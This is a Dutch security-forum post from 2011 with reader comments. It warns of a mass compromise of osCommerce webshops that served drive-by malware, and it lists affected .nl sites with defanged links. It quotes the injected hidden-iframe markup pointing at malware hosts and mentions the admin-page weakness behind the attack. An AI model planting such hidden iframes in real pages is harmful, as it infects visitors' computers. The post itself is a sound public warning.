Computerbeveiliging - Hoe je bad guys buiten de deur houdt

Golf van cracked websites met drive-by malware

26-07-2011, 21:31 door Bitwiper, 12 reacties
http://blog.armorize.com/2011/07/willysycom-mass-injection-ongoing.html meldt een golf van gekraakte websites die malware uploaden (bron: http://threatpost.com/en_us/blogs/massive-iframe-attack-hits-more-90000-pages-072611).

Het bezoeken van zo'n gecompromitteerde website met een niet volledig gepatchte PC (webbrowser, besturingssysteem, Java, Adobe Reader, Adobe Flash, Quicktime en mogelijk andere plugins) is voldoende om je computer te laten besmetten (er is dus geenzins sprake van dom klikvee).

Zoeken op "src=http://exero.eu" site:.nl wees uit dat in elk geval de volgende Nederlandse websites (soms alleen deze en subpagines van onderstaande) gecompromitteerd zijn (Google waarschuwt voor slechts een enkeling van onderstaande sites):

hxxp://123clonephones.nl/
hxxp://innologic.nl/
hxxp://onderdelenvolvo.nl/
hxxp://sanik.nl/webshop/
hxxp://www.2ehands-online.nl/
hxxp://www.accuwijzer.nl/catalog/
hxxp://www.ballookado.nl/catalog/
hxxp://www.berkenpeis.nl/winkel/
hxxp://www.blingsundaysbest.nl/webshop/
hxxp://www.bottegabijoux.nl/shop/information_2.php
hxxp://www.depaardenshop.nl/shop/index.php?cPath=29_33
hxxp://www.dilomatoro.nl/
hxxp://www.dogsupplyservice.nl/english_kitchen/winkel/index.php?manufacturers_id=12&page=1&sort=2d
hxxp://www.duraroos.nl/catalog/
hxxp://www.dutchfone.nl/
hxxp://www.eshopsplaza.nl/wakkerdier/
hxxp://www.glazen-deur.nl/
hxxp://www.height-safety.nl/store/catalog/
hxxp://www.hippestippe.nl/shop/products_new.php?page=13
hxxp://www.keijlsmagic.nl/winkel/
hxxp://www.koffiebonenonline.nl/
hxxp://www.marinestore.nl/
hxxp://www.mirjamsknutselplezier.nl/products_new.php
hxxp://www.nikahorseproducts.nl/catalog/
hxxp://www.nordicnew.nl/onlineshop/
hxxp://www.paintballclub.nl/shop/catalog/
hxxp://www.rpgamershop.nl/shop/
hxxp://www.shoes-n-things.nl/
hxxp://www.tagdepartment.nl/store/
hxxp://www.umutelectronica.nl/
hxxp://www.yottawatts.nl/

Bij een deel van bovenstaande webshops kun je met een creditcard betalen...

De volgende sites/pagina's waren volgens Google gecompromitteerd maar lijken ondertussen gefixed:
hxxp://www.bodyflower.nl/winkel/
hxxp://www.europacker.nl/shop/
hxxp://www.morgenisnu.nl/shop/eldiolie495ml-p-397.html

Op besmette sites zie je in de source van elke pagina iets als:

<title>Innologic</title><iframe src='http://exero.eu/catalog/css.htm'
style='position:absolute;visibility:hidden'></iframe><title></title>

Zoeken naar "http://willysy.com/images/banners/" site:.nl levert vergelijkbare resultaten op met deels dezelfde sites.
Reacties (12)
26-07-2011, 22:23 door Bitwiper
Aanvulling: de oorzaak is wellicht een op 2011-07-10 gepubliceerde 0Day voor de open source "osCommerce" software (van http://www.oscommerce.com/). Kennelijk kun je, zonder te zijn ingelogd, de "Site Info" wijzigen (en zo bijv. javascript invoegen). De "exploit" (niet veel meet dan een aanwijzing) staat op http://www.1337day.com/exploits/16505.

N.b. ik publiceer de URL naar deze exploit omdat de site bekend is bij blackhats, en webserver admins mogelijk beter maatregelen kunnen nemen/workarounds kunnen toepassen, bijv. door de URL /admin/configuration.php van buitenaf ontoegankelijk te maken (in elk geval tot er een fix is, en wellicht ook daarna).

Bijv. hxxp://www.bikes4less.nl/catalog/ (bezoeken op eigen risico!) laat zien dat deze site al eerder werd gekraakt met waarschijnlijk dezelfde exploit:

<title>Hacked By Tn Mahdi Sad Hacker<iframe src='http://willysy.com/images/banners/'
style='position:absolute;visibility:hidden'></iframe></title>
van de rest van die webpage klopt trouwens ook niet veel meer.
27-07-2011, 07:55 door Anoniem
NEEEE NIET mirjamsknutselplezier.nl :(
27-07-2011, 10:45 door Anoniem
Wie bezoekt er dan ook sites die beginnen met hxxp:// .....
27-07-2011, 12:21 door Anoniem
Door Anoniem: Wie bezoekt er dan ook sites die beginnen met hxxp:// .....
Dit heeft de TS ervoor gedaan dat de URL's niet automatisch geparsed worden en dus onklikbaar zijn.
28-07-2011, 08:50 door Anoniem
Deze exploit is geen echte exploit. osCommerce werd in een van de eerste versies zonder beveiligde backoffice geleverd. Hier moest de gebruiker zelf voor zorgen. Deze versie is ongeveer 5 jaar oud, en de voorbeelden uit de zero day van Bitwiper hebben allemaal geen beveiligde admin. Dan is het ook vragen om problemen. Nu heb ik een aantal site's gepakt uit de lijst hierboven, en die zijn wel beveiligd. Echter via een andere exploit kan wel toegang tot de backoffice verkregen worden. De oplossing hiervoor is deze fix:
http://forums.oscommerce.com/topic/351671-the-major-security-hole-that-has-been-the-buzz-spam-loginphp-exploit/
28-07-2011, 10:17 door PeterB
Heerlijk toch al die CMS systemen :( Geef mij maar ouderwetse plain html. Geen databases die via injects misbruikt kunnen worden, geen exploits etc. Wat er niet opgeslagen staat op een site kan ook niet misbruikt worden....toch ?
28-07-2011, 12:01 door Bitwiper
Door Anoniem: NEEEE NIET mirjamsknutselplezier.nl :(
LOL!
Aan de andere kant, ik vermoed dat bezoekers van dat soort sites minder goed patchen dan bezoekers van bijv. rpgamershop.nl - of zou dit weinig uitmaken?
28-07-2011, 15:10 door Anoniem
Door Anoniem:
Door Anoniem: Wie bezoekt er dan ook sites die beginnen met hxxp:// .....
Dit heeft de TS ervoor gedaan dat de URL's niet automatisch geparsed worden en dus onklikbaar zijn.

Nog nooit van ironie gehoord ?
28-07-2011, 16:05 door [Account Verwijderd]
[Verwijderd]
28-07-2011, 18:28 door Anoniem
Door Peter V: Deze bijdrage van Bitwiper toont maar weer eens aan hoe belangrijk het is om goed te patchen!

Een heel goede tool om je patchbeleid op orde te hebben is de tool Personal Software Inspector van Secunia.

De tool is hier te downloaden: http://secunia.com/vulnerability_scanning/personal/


Bedankt voor de tip Peter V!
29-07-2011, 01:38 door Anoniem
Mensen zijn soms domme wezens.
29-07-2011, 10:21 door Anoniem
Soms?? Laat dat maar weg.
Reageren

Deze posting is gelocked. Reageren is niet meer mogelijk.